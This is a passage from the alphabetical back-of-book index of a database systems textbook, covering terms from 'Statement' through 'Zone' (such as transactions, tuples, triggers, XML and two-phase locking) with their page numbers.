275-276, 280-281, 301-303, 305, 311, 318,
328, 339-341, 359-360, 365, 381-382,

389-390, 392, 396, 433, 512, 516-517, 519,
525-527, 538-542, 544, 546-547, 551, 553,
555, 560-562, 574-576, 578, 633-634, 670,
732, 755-759, 766-767, 777-778, 795, 801,
824, 908, 923, 944-948, 950-951, 983,
985-986, 990

Statecharts, 339
Statement, 36, 83-85, 87, 89-93, 97, 103, 106, 115,

131-132, 135, 139-140, 189, 367, 459-461,
466, 468, 472-475, 478-480, 482-484, 503,
671-672, 727, 774, 778, 844, 854, 857-859,
870, 916, 934-935, 937-942, 954, 981,
983-984, 987

Statement-level trigger, 935, 941
States, 31, 57, 62-63, 66, 69-70, 72, 186, 189, 207,

219, 339-341, 366, 511, 515, 521-522, 542,
581, 755-756, 761, 772, 776-777, 781, 801,
807, 851, 863-864, 955, 958, 962, 968-970,
982

exit, 341, 777
transition, 339-341, 756
waiting, 783, 807

Statistics, 40-41, 312, 333, 724, 730, 735, 739-740,
745, 838-839, 956, 997, 1000, 1012,
1024-1025

Stemming, 1000, 1009, 1012, 1029, 1031-1032
Steps, 130, 162, 288-290, 293, 296, 336, 341, 353,

402, 415, 465, 473, 477, 528, 532, 623,
684-685, 688, 705, 709, 713-714, 750, 865,
869, 924, 999, 1010-1012, 1020

Storage devices, 20, 588-589, 591-592, 597, 627-629,
635

backup, 591, 597, 829
removable, 589

storage management, 627, 824
storing, 3, 7-8, 15, 46, 48, 280, 357-358, 399, 430,

435-436, 447, 514, 525, 588, 593, 600, 613,
623, 626, 629, 700-701, 716, 737-738, 957,
993, 1000, 1065

Storing data, 8, 600
Streaming, 428
Strict schedule, 763, 788, 822
String, 5, 19, 23, 57-58, 87-89, 100-101, 211, 324,

366, 382, 385, 391, 393, 396-397, 403-406,
408, 410-411, 432-433, 443-445, 456,
460-462, 465, 467, 469-470, 472-474,
477-480, 493-495, 497, 499-502, 600,
612-613, 617, 857-859, 866, 952, 1024

default value, 89
String class, 396
string comparisons, 89, 743
String data, 87, 101, 429, 505
String data type, 87, 429
String data types, 87, 101, 505
String functions, 495
strings, 37, 57, 64, 87-89, 100, 151, 362-363, 382,

411, 484, 493-496, 503, 505, 600, 612, 859,
969, 999

concatenation of, 666
escape characters, 859
length of, 87-88

Stripe, 626
Striping, 623-626, 635
Strongly typed, 372
struct, 8, 362-363, 374, 382, 385, 390-391, 396, 398,

401-402, 405-406, 408-410, 600
Structure, 3-4, 8-11, 17, 20-21, 28-32, 41, 48, 50, 56,

75, 92, 140, 148, 166, 210, 273, 312,
315-316, 318-319, 335-336, 357-360, 362,
365, 373-374, 381-382, 390, 400-401,
403-405, 410, 412, 420-422, 441-442,
445-447, 461, 465, 467, 482-483, 592, 600,
616-618, 620, 622, 630, 633, 651-655, 660,
665, 667-668, 673-676, 682-683, 686,
705-707, 721, 723, 802, 975, 998,
1011-1013, 1018-1020, 1024-1025, 1033,
1035-1036

decision, 319, 401, 1035-1036
structures:, 410
styles, 424, 1039-1040
Stylesheet, 420, 441
Subclass, 246-262, 264-266, 269-270, 274-275, 285,

296-299, 307, 401-402, 551, 578, 582, 1010
submit, 244, 421, 490, 492-493, 498, 763
Subscript, 625, 760
Subtraction (-), 101
Subtrees, 438, 651, 653, 714
Subtype, 247-248, 369-372, 379, 387, 389, 392, 414
Sum, 124-125, 130, 134, 137, 142, 169, 171, 407,

517, 570, 596, 624, 668, 687, 726, 753, 804,
939-940, 942, 955, 984-985, 1003,
1020-1021, 1062

Sun Microsystems, 471, 476
superclasses, 247, 252, 257, 259-261, 265-266,

299-301, 322, 402
Superkey, 65, 76, 153, 525-526, 535-537, 541-542,

558, 574-575
Supertype, 248, 369-370, 372, 379, 387, 389, 392
Support, 1, 8, 11, 19, 23-25, 28, 31, 33, 36, 47-49, 51,

70, 103, 189, 263-264, 271, 275, 311, 329,
343, 347, 352-353, 394, 412, 628, 634,
674-675, 736-737, 774, 779, 799, 839, 853,
890, 914-915, 920-922, 924, 951, 955, 962,
965, 989, 1006-1008, 1034-1037,
1041-1042, 1044-1049, 1063

SUPREME, 866
Surrogate key, 232, 300-301, 947
Surveillance, 964
Switches, 497, 627-628

hubs and, 627
Sybase, 42, 55, 311-312, 328, 350, 352, 501, 741, 876
Symbols, 140, 180, 234, 429, 435, 503, 562-563, 584,

657, 866, 969, 971, 1002-1003, 1050-1052,
1056

Synchronization, 329, 347, 862, 914
Syntactic analysis, 1005
syntax, 36, 38, 83, 107, 109, 132, 140-141, 171, 178,

188-189, 367, 377-378, 394, 402-404,
410-411, 413, 428, 483-484, 684, 759,
855-856, 916, 931-932, 935, 942, 971, 981,
984, 1021

details, 36, 38
Syntax errors, 483
Syntax rules, 430, 684
system architectures, 42, 626, 887-888, 920
System bus, 43
System Catalog, 39-40, 333
system clock, 792
system development, 355
System documentation, 312
system error, 754
system failures, 761
SYSTEM GENERATED, 375-378
system log, 755-757, 763, 776-777, 811, 815-817,

821, 829-831, 840
System R, 83, 106, 716, 730, 835, 875, 926
System response time, 13
system software, 14, 27, 38, 52, 622, 629

T
Table, 124, 139, 380, 949
base table, 139
Table scan, 672, 703, 724-726
tables, 19, 26, 48, 75-76, 83-85, 98, 102, 105-107,

115, 117, 119, 123-124, 129-130, 133-141,
149, 160, 172-173, 189, 193-194, 291-292,
319, 336, 346, 351, 376, 457, 460, 503,
505-506, 647, 674, 713, 716, 737-739,
741-744, 756, 824-828, 844, 869-870, 908,
916, 940-941, 954-955, 1040-1042, 1065

attributes of, 119, 123-124, 134, 160, 173, 193,
289, 291-292, 460, 742, 844, 950

Master, 742, 918, 941
Super, 85, 117, 123-124, 172, 292, 1065

Tag, 423-428, 434-435, 437-438, 491, 493, 497, 500
Tags, 49, 422-425, 427-428, 433-435, 438, 448, 491,

493, 500, 967
tape drives, 43, 591, 598, 628
Tapes, 589-592, 597-598, 630, 755, 829
Task, 3, 49, 321, 329, 337, 349-350, 483, 673, 684,

755, 845, 853, 880, 915, 963, 994-995, 997,
1008, 1011, 1018, 1022, 1047-1048

TCP/IP, 629

Technology, 1-2, 7, 24-25, 47, 246, 259, 268, 310, 312, 348, 351-352, 413, 441, 589-590, 593, 595, 598, 622-623, 626, 628-631, 635, 842-843, 852, 854, 863, 869-870, 876, 997-998, 1028
Temperature, 940, 958
Tertiary storage, 589-591
Testing, 64, 201, 313-314, 333, 465, 530, 533, 543, 564, 586, 767-768, 770-771, 773, 776, 863, 881
automated, 314
Tests, 509-510, 523-524, 532, 552, 1065
text, 2-3, 24, 37, 40, 43, 79, 87, 239, 241, 266, 331, 346, 420, 423-427, 447, 465, 471, 483, 490-495, 498-499, 522, 600, 839, 855, 866, 878, 886, 916, 963-964, 987, 992-994, 996-999, 1006-1008, 1010-1012, 1018-1019, 1023, 1025, 1031-1032
Text:, 494
text
alternative, 430
text editor, 495, 914
Text file, 491
Text files, 40
text processing, 24, 494, 1008
Thesaurus, 273, 1000, 1006-1007, 1009-1012, 1031-1032
this object, 338, 913
Threads, 336
Threats, 836-838, 856, 863, 868, 871, 875
Three-tier architecture, 45, 51, 491, 505
Three-tier client/server architecture, 46
Three-valued logic, 81, 88, 116, 517
Threshold, 621, 861, 941
Throughput, 333, 598, 739-740
average, 333
Time, 1, 4, 10-11, 13, 19-21, 23-24, 30-31, 33, 36, 47, 63-65, 82-83, 87-89, 101, 104, 114, 125, 134-136, 164, 191, 210-212, 218, 227, 238-239, 241, 256-257, 263-265, 267, 270, 275-276, 283, 302, 311-312, 330-332, 336-338, 343, 381-383, 387, 411-412, 418, 425, 462-463, 465, 496-497, 551, 558, 578, 586-587, 590-592, 595-600, 604-605, 615, 617, 619, 623-625, 629-634, 640, 654, 688-689, 691, 698, 700-702, 715-718, 723, 726-728, 735, 747-750, 752-755, 758-759, 762-765, 770, 773-774, 785-786, 789-792, 824-825, 827-828, 869, 908-909, 912, 924-925, 941-955, 963-964, 967, 973, 982-983, 985-986, 988, 991, 1024-1025, 1035-1037, 1047, 1054-1056
Time:, 1056
Timeout, 791, 806
timeouts, 788, 791, 805
Timestamp, 64, 88-89, 101, 125, 382-384, 389, 411, 772, 780, 791-795, 797, 803-808, 866, 943-944, 947-950
Timestamps, 772, 780, 789-792, 795, 797, 799, 803, 805-806, 925
Timing, 734-735, 862-863
title, 3, 79, 108, 191-193, 244, 262, 276-277, 283, 327, 424, 453, 485, 489, 507, 547, 738, 985
Tokens, 684, 1007, 1011
tools, 7, 15, 25, 52-53, 56, 70, 201, 204, 232, 272, 309-310, 314, 316, 319, 321, 325, 328-329, 331-332, 334, 343-344, 348-354, 356, 441, 855, 868, 938, 1018-1019, 1026, 1034-1036, 1052
Arrow, 1052
Line, 1050, 1052
Oval, 1050
Rectangle, 1050
Top-down design, 322, 509
Topologies, 627, 879
Tracing, 757
Track, 7, 15, 79, 138, 191, 201, 204-205, 221, 233,

236-239, 256, 262, 275-279, 344, 472, 476,
544, 593-596, 607, 615, 629-631, 649, 717,
755, 776, 782-783, 812, 840, 845, 898, 955,
980, 982, 1054-1056

Trademark, 471, 476
Traffic, 912-913, 958
Training set, 1021
Transaction, 4, 8, 11-12, 18, 20, 25, 39-40, 45, 48, 56,

75-76, 83-84, 203-204, 283, 310-312, 315,
318-319, 328-329, 332-333, 355-356, 464,
610, 739-740, 742, 746, 747-779, 780-785,
787-801, 803-805, 807-809, 810-835, 840,
863, 877-878, 890-894, 907-912, 917, 920,
922, 926, 931, 936-937, 940, 944-945,
947-952, 954, 962, 982-983, 1042

Transaction file, 610
Transaction manager, 800, 825, 828, 890, 907-908
transaction processing systems, 310, 312, 747-748
Transfer time, 596-597, 629, 631-632, 634, 1055-1056
transferring, 41, 597-598, 605, 716, 902, 904,

1054-1055
Transitive rule, 553, 558, 575
Translator, 466
Transmission, 628-629, 861, 863

transparency, 879-882, 886, 889, 894, 905, 913, 916,
920-921, 1037

Traversal, 800
Traverse, 364, 403, 428, 658, 800
tree structure, 256, 427-430, 438, 442, 446-447, 652,

657
Trees, 166, 183, 189, 446, 588, 592, 622, 651-652,

656-657, 660, 665, 674-675, 679, 706-708,
714, 723-724, 728-730, 736, 741, 807, 924,
960, 964-965, 982-983, 988

implementations of, 657, 982
Trigger, 19, 70, 115, 131-133, 139, 621, 931, 933-938,

941-942
trimming, 1009
trust, 843, 867-868
Truth value, 179, 184, 974
Tuning, 18, 38, 313, 315-317, 333-334, 350, 356, 589,

733-746
Tuple, 57-58, 60-66, 69-70, 72-77, 80, 83-84, 89,

91-93, 95-99, 102-103, 105, 116-124, 126,
130, 132, 136-139, 149-153, 158, 160-162,
164-167, 170-174, 177-181, 184-190, 194,
197-198, 270, 290, 292-293, 295, 297-298,
300, 361-364, 366, 373-374, 378, 390,
401-405, 461-462, 468, 470-472, 479-480,
483, 513-517, 525-529, 538-539, 546-548,
562, 570, 572, 577, 581, 583-584, 666,
696-697, 702, 849-851, 904-905, 945-951,
953-954, 961, 968, 982-983, 985, 1040

Tuple variable, 93, 119, 178-181, 184, 190, 194, 687,
941

Two-dimensional array, 479
two-dimensional arrays, 495
Two-phase locking, 772, 780-781, 785-787, 789, 795,

801, 805-808, 822, 925
type attribute, 220, 264, 296-300, 434
Type compatibility, 156
Type constructor, 362-363, 374

U
UDT, 374-375, 377-379
UML diagrams, 269, 309-356
Unary operator, 155
Unauthorized disclosure, 837
UNDER, 3, 22, 24, 77, 122, 233, 235-236, 239, 244,

296, 298, 302, 331-333, 339, 349, 374-376,
379-380, 434, 438, 444, 447, 471, 491, 502,
513, 596-597, 624, 634, 665, 728-729, 746,
773, 785-786, 796-797, 811-812, 846,
853-854, 870, 916, 918, 922, 924, 937,
966-967, 974-975, 977, 980-981, 1054,
1061-1064

Underflow, 662, 664-665
underscore character (_), 494, 1058
Unified Modeling Language (UML), 202, 226
Union:, 156
UNIQUE, 19, 36, 50, 52, 57, 66, 70, 77, 86, 90-91,

120, 122, 131, 145-146, 237, 241, 243-244,
270, 277-278, 282-284, 346, 367, 377-378,
381-382, 386, 389, 391-392, 406-407, 496,
503, 528, 547, 581, 583, 637-638, 653, 655,
674-675, 725, 727, 734-737, 741, 750, 780,
792, 907, 925

United States, 57, 205, 207, 521-522, 837, 864, 886,
962

Universal access, 1017
University of California, 1028
UNIX, 491, 628
UNKNOWN, 58, 61, 75, 97, 116-117, 208, 517, 861
unsigned short, 382-384, 393, 411
Unspanned blocking, 632, 634
Update, 3, 11, 14-15, 17-20, 26, 31, 34, 36, 40, 50, 56,

70-77, 90-91, 102, 104-109, 132-138, 142,
146, 293, 328, 333, 342, 346-347, 365, 401,
463-465, 513-514, 524, 543, 545, 549, 576,
606, 653, 665, 734-737, 751-753, 759, 762,
773-775, 800-801, 810-812, 814-815,
818-822, 827-828, 830-833, 847, 875, 905,
913, 922, 926, 931-942, 946-950, 959, 961,
981, 983, 985, 1058, 1064-1065

Update command:, 465
updating, 3, 7, 11, 13, 19, 42, 74, 104, 132-133, 136,

316, 455, 465, 493, 734-735, 737, 752, 775,
815-816, 823, 829-831, 911-912, 949-951,
959, 1043-1044

upgrades, 628, 788
USAGE, 23, 41, 312, 334, 716, 727, 739, 881, 942,

988, 1009, 1018, 1024-1027, 1029, 1031,
1033, 1042, 1044

USB (Universal Serial Bus), 590
Use case, 335-338, 341, 352
use cases, 336-337, 341-342, 344
Use of information, 842
User:, 851
User authentication, 856, 919
User interface, 42, 44-46, 329, 338, 892-893, 1060
user profiles, 855
user requirements, 239
User-defined, 28, 106, 253-254, 265, 274, 347, 370,

374, 378, 382, 386, 389-390, 392, 413-414,
945

User-defined functions, 378
users, 1-26, 28-29, 32-42, 45-48, 51-52, 82, 84, 106,

123, 130-131, 143, 201-202, 204, 212-213,
222, 237, 253, 259, 273, 309-318, 320-322,
334, 336-337, 353, 358, 367, 380, 392, 413,
425, 517, 525, 592, 606, 627, 673, 747-749,
763, 829, 836-844, 848-852, 854-858,
862-863, 869, 874, 881-884, 913-914, 919,
926, 958, 963, 982, 993-995, 997-998,
1006-1007, 1014, 1017-1019, 1023-1030,
1045, 1048

UTF, 431
UTF-8, 431

V
Valid values, 74, 502
Validation, 313-314, 337, 484, 772, 780, 794, 797-798,

805-806, 859, 1028
Value, 10, 15, 19, 31, 57-58, 60-66, 69-70, 72-75,

87-89, 95, 98, 100-101, 103, 105, 107,
116-120, 123, 125-128, 160, 173-174,
178-179, 184, 186, 195, 206-209, 211-212,
216, 220, 230, 235-237, 253, 294-295, 351,
359, 361-364, 368-369, 377-378, 380-382,
384-386, 388-392, 400, 403, 406, 410, 430,
438-440, 474, 482, 484, 492-500, 516-517,
521-522, 540, 543, 581, 583, 592-593,
599-604, 606-622, 629-630, 632-634,
637-649, 651-660, 662, 665-669, 671-675,
703-704, 721-722, 724-726, 750, 760-763,
772-775, 780-781, 792-796, 804, 813-814,
816-822, 833-834, 841, 849-851, 914, 951,
964-965, 968, 970, 974, 977, 1003,
1023-1025, 1054, 1058-1060

initial, 31, 87, 212, 216, 351, 377, 492, 619,
765-767, 854

truth, 116, 179, 184, 974
Values, 5, 16-17, 19, 52, 55-66, 69, 72-76, 85, 87-90,

92-93, 95, 100-105, 116-119, 122, 124-126,
130, 137, 146, 150-151, 153, 158, 169,
172-176, 178-180, 182, 185-187, 196,
206-208, 221, 234, 237, 270, 292-293, 295,
344, 360-363, 366, 369-370, 373, 380, 386,
389-390, 400-401, 404-405, 413, 421-422,
426-427, 437, 447, 461-462, 468-469,
473-474, 481-482, 492-497, 499-503,
514-517, 520-522, 526-528, 536, 538, 540,
545, 562, 599-602, 604-608, 612-615,
617-618, 632-633, 652-659, 662, 666-671,
675, 677-679, 682-683, 690-694, 702-703,
716-720, 726-727, 739, 757-759, 775-776,
780-781, 838, 849-851, 860-861, 950-951,
963-964, 968-974, 976-978, 1003-1004,
1059-1063

undefined, 61, 116
Variable, 17, 64, 87-88, 93, 119, 178-181, 184,

186-187, 190, 194, 360, 363, 404-405, 408,
410, 434, 439-440, 459-462, 472-474, 479,
482, 492-494, 496-497, 499-500, 502-504,
600-603, 605, 607, 629-630, 632, 781-782,
859, 914, 941, 969, 977-978, 993,
1058-1061, 1063

variable declarations, 459
variables, 17, 95-97, 119, 150, 178-181, 186-187, 189,

194, 360-361, 365, 369, 403-404, 410-411,
414, 439, 457, 459-463, 465, 467-470,
473-475, 477, 479, 483-484, 494-497, 499,
585, 962, 968, 970-974, 977-978, 1026,
1058-1062

data type of, 479
values of, 17, 97, 178-180, 186-187, 361, 496, 499

Vector, 892, 965, 996, 999-1000, 1002-1004, 1013,
1029-1030, 1032

vector graphics, 892
vertical bar, 87
video, 1, 23, 282, 590, 600, 623, 930, 963-964,

966-967, 982, 998, 1017, 1029

View, 11-13, 25, 32-33, 35, 51-52, 85, 104, 130,
133-137, 140, 142-143, 251, 315, 321-322,
325-327, 340, 350, 352-353, 355, 386,
406-407, 442-445, 744, 766-767, 772-773,
776-777, 779, 794, 843-845, 849, 854,
869-870, 873, 876, 889, 913, 916, 936, 988,
1022-1024, 1026, 1048-1049

View:, 847
viewing, 251, 636, 854, 1025
Visual Basic, 352, 892
volume, 326, 330, 626, 742, 868, 887, 902, 989, 993,

1034, 1037, 1043-1044
Vulnerability, 851

W
Wait-die, 789-791, 806-807
Web, 1, 18, 22, 24-25, 36-37, 43, 45-46, 49, 51-53, 56,

273, 285, 312, 329-331, 420-425, 427, 433,
436-437, 456, 480, 486, 490-506, 628, 745,
855-859, 892, 925-926, 967, 992-1033

Web analytics, 1026
web browsers, 892
Web page, 421, 425, 490, 493, 500, 505, 999,

1018-1021, 1027, 1033
Web pages, 22, 24, 37, 46, 420-423, 425, 490-491,

493-494, 504, 878, 892, 993-994, 996,
998-999, 1018-1027, 1031

Web server, 46, 491, 500, 858
Web servers, 22, 27, 43, 1027

name of, 1027
Web services, 441
Web Services Description Language (WSDL), 441
Web sites, 476, 505, 745, 868, 1017
websites, 356, 879, 1027
WELL, The, 651
Well-formed XML, 428, 855
what is, 26, 51-52, 76, 177, 190, 194, 236, 274-275,

353, 414-415, 448, 456, 485, 505, 544-546,
583, 630-631, 676, 728-729, 776-778, 799,
806, 873-874, 984, 998, 1030-1031, 1039,
1044, 1048

Where-clause, 120, 687, 727, 743, 775, 857
while loop, 470
While-loop, 503
Wiki, 1020
Wikipedia, 1020
Windows, 491, 628
Wireless networks, 47
WITH, 1-4, 7-10, 12-14, 16-19, 21-26, 27-28, 31, 33,

35-52, 55, 59-66, 70-77, 79-81, 82-84,
87-93, 95-98, 100-107, 115-126, 128-130,
136-143, 149-152, 155, 158, 160-164,
166-176, 178, 180, 182-183, 185-190,
193-195, 198, 204-205, 207-214, 217,
221-223, 226-230, 232-233, 235, 242-243,
247, 249, 251, 255-260, 264-269, 271,
275-278, 280-284, 289-293, 295-299, 307,
316-322, 328-331, 333, 335-342, 344-345,
348-349, 351, 354-355, 358-362, 365,
369-370, 372-374, 378-379, 386, 388-390,
392, 394, 399-402, 405-406, 409-413,
415-416, 427-428, 434, 436-439, 441,
443-448, 461-472, 474-480, 484-485,
490-504, 519-525, 532-542, 544-548,
556-562, 564-579, 581, 583-584, 588-598,
600-602, 604-610, 612-615, 617-635,
640-641, 643-646, 651, 653-683, 686-687,
691-693, 695, 698-705, 711-715, 717-724,
733-738, 740-744, 750-752, 756, 758-761,
776-777, 781-783, 786-801, 803-806,
810-814, 818-819, 821-826, 828, 839-854,
856-875, 878-898, 901-902, 904-905,
907-916, 919-923, 931, 933-937, 940-944,
946-958, 960-975, 977, 981-982, 984-986,
989, 992-1000, 1002-1008, 1010-1012,
1014-1022, 1024-1026, 1028-1033,
1039-1049

With check option, 137
Words, 2, 37, 60, 77, 177, 194, 266, 273, 359, 526,

533, 569, 843, 853, 964, 995, 999-1000,
1005-1011

frequency of, 1002, 1008
workflows, 853, 926
Workstation, 27, 311
World Wide Web, 1, 22, 331, 878, 995, 997,

1017-1019, 1033
standards and, 997

World Wide Web (WWW), 878
Worm, 590

Wound-wait, 789-791, 806-807
WRITE, 4, 21, 38, 40, 77, 82, 90, 96, 103, 107, 109,

121-122, 124-126, 129-131, 133, 139, 154,
177-178, 184, 186, 191, 194, 386, 405-409,
439, 459, 465-467, 480, 482, 485, 506, 547,
584, 590, 595-598, 624-625, 630, 632,
748-751, 755-764, 766-768, 770, 772-775,
777-778, 781-789, 792-799, 803-805,
810-825, 830-835, 862-863, 907, 923-924,
970, 977, 984-985, 1001, 1054-1056

Write operation, 755, 757, 763, 766, 772, 793-794,
801

writing, 20, 85, 96, 105, 131, 178, 187, 194, 253, 318,
333, 366-367, 372, 412, 420, 458, 465-466,
472-473, 482, 582, 598, 604-605, 625, 685,
689, 701, 726, 758, 767, 812, 824-825,
833-834, 849, 863, 869, 937-938, 1021

X
XML, 22, 47, 49, 51, 53, 83, 209, 374, 420-448,

450-453, 836, 854-856, 876, 892-893, 926,
993-994, 1021, 1027

XML (Extensible Markup Language), 420
XML Schema, 421, 427-428, 430-431, 433-437, 440,

442-448
XPath, 421, 431-432, 435, 437-439, 447
XSL (Extensible Stylesheet Language), 420
XSLT, 420, 441

Y
y-axis, 1016
Yield, 160, 185, 249, 298, 528, 543, 565, 578, 670,

740, 968

Z
Zero, 87, 100, 104, 163, 218, 224, 244, 341, 369, 399,

404, 429, 439, 495-496, 621, 754, 813, 870,
1003, 1052

ZIP codes, 670, 923, 956
Zone, 88

